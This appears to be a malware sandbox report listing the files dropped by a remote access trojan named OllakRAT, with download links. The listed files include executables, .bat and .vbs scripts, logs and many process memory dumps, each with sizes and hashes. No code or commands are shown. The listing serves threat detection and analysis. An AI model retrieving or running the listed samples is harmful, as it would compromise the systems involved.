c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\OllakRAT64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\bad_1B5F69C1AEAC538E.txt

Filesize
5KB

MD5
c167689b87531bb5da7e4f8a5305a144

SHA1
2e41941241cecb7528023be6d341bb7d45dd25a2

SHA256
11f1c33b96631e6a7d667d5c8ea07507b39eca612f24cbc4b6d3c796ce8bd485

SHA512
5a67660e93c8dcdeb7f00e4b32bda9f4fb8921eb0032c1a2c153c9a7062fcbb802fda2adcc813f6590e4fe960d6d8a40773f471928e758243d0fa0e6ecbbcd3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\elog_1B5F69C1AEAC538E.txt

Filesize
19KB

MD5
89a25ff6773390a63dcb6e1bbd67fc7b

SHA1
5f83c656381e446a410949f87fbad9268dc7cb33

SHA256
c83d1fd8a448b61b42d4d8a8120ab2422493fd7a1d337f634dfc6446d269a1b2

SHA512
501280c5e1cb2ec7c85db317779907b676fadc0d7d9bed8c0b1953ee54f8aef7a2cf496f7ff7976e3a5a2e13a42a783c6b1cfeb7bf78851defeefacab6ed1b03

Download Submit
C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat

Filesize
226B

MD5
4220246cea74bbc7c20b5a477af82b93

SHA1
0de4f6c013b053a25195bc581e8ebdb69e4e62be

SHA256
6e8b7527167cf2fb542e55dcbb7fb7c7ac2938c4afbc51587d4c0ebc664267e9

SHA512
669a385058732187b4a58eb37c888da772eb276f97ef50605903baed5cd46ebef5f0e56ae24b735edab143157a062c64d14c20cbd0ffa987548f36972c08c6aa

Download Submit
C:\Users\Admin\AppData\Roaming\9OG3Vr2A.vbs

Filesize
260B

MD5
1b70c48b02d34feea3300e872ec5f1e2

SHA1
95200b70e80682154ba3c3c4771f5e3d9fcae950

SHA256
d94d4588fe404fe944f2beff2b25db80b48056440bb80c049fbb049915a13f35

SHA512
90caccd13c7e39f960c2c4d9eb89b2ebe18f7a7ff5dcf1f7294ebc66a8d6b0a2b7135fa85cd95d7392e34d910a6d17098a106428b65ac2f0734a25e66d984605

Download Submit
C:\Users\Admin\AppData\Roaming\bOcTXSdl.bat

Filesize
265B

MD5
df7f361877a0e0416e2e400326c12326

SHA1
fec276d0f9c746746241fb458f21637a2c0e3a4c

SHA256
ef05db5dfdc676a94cbdc620639c5203e253a8284e8ade22e32fefd9688a3d03

SHA512
6b79e7812663f27fb3ef859d96d2a5e8678dc9e400571369b40e7440df5b5797faf596debb776bcf1e0148f9c9c11ca07976fed9bb7edd20e896854f95446984

Download Submit
memory/272-7929-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/288-7969-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/412-8016-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/720-7937-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/720-140-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/720-7863-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/720-6369-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/720-2841-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/956-8010-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1160-8093-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1324-4735-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1508-7848-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1616-8075-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1636-7852-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1832-8067-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1864-8003-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1952-8044-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2076-7925-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2180-7066-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2236-8030-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2296-7955-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2404-7887-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2536-7977-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2580-5644-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2688-7919-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2856-7983-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2864-7871-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2932-8005-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3084-6372-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3096-7992-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3204-6918-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/3204-430-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/3216-7869-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3240-8046-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3308-8077-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3768-7859-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3768-8018-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3804-7933-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3836-7917-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3836-7883-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3848-620-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3848-3881-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3868-7945-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3980-7895-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4036-7899-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4044-7981-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4052-2638-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4088-7949-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4124-7971-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4336-7907-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4416-3688-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4416-3691-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4432-7997-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4448-8033-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4452-7951-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4544-8060-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4592-7253-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4712-8035-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4712-3919-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4712-3827-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4776-5172-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4776-8041-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4796-7891-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4820-7975-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4928-7889-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4944-7935-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5068-8052-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5132-8028-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5144-7911-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5152-4695-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5164-7846-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5208-7915-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5220-8073-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5236-7957-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5236-7877-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5308-2456-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5320-7939-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5332-7903-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5400-7942-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5420-8054-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5436-7758-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5440-8056-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5444-8050-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5448-7962-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5508-7913-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5512-8086-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5512-6867-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5512-7875-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5532-7854-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5544-7923-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5628-8020-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5640-7927-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5644-7865-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5708-7964-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5712-8014-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5720-5029-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5776-7867-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5784-7901-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5796-8062-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5800-7844-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5804-7072-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5808-8079-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5824-8069-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5840-8008-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5860-8001-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5872-8091-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5872-8039-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5884-8084-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5884-6919-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5916-8024-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5920-7181-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5920-7182-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5940-7953-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5968-7880-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5972-7988-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5988-7995-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6004-7990-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6004-8022-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6016-7905-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6040-7857-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download